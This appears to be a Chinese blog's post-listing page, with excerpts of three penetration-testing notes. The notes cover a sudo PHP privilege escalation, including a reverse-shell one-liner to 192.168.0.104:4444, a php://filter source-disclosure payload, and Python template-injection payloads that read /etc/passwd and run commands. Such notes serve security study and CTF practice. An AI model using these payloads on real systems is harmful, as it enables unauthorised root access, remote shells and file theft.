自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 sudo -l 存在root /usr/bin/php 越权

root密码也可以是网站配置中数据库的密码nc -lvp 4444sudo /usr/bin/php -r '$sock=fsockopen("192.168.0.104",4444);exec("/bin/bash -i <&3 >&3 2>&3");'two越权sudo php -r 'system("/bin/bash");'...

2020-02-24 14:10:18 645

原创 php内置协议直接读取代码及preg_replace()任意php执行漏洞

尝试读取index.php的页面源码,通过php内置协议直接读取代码?page=php://filter/read=convert.base64-encode/resource=index.php

2020-02-17 16:05:08 476

原创 .py 模板注入

python模板注入 payload{{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].popen('ls'...

2020-02-14 15:32:06 130

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除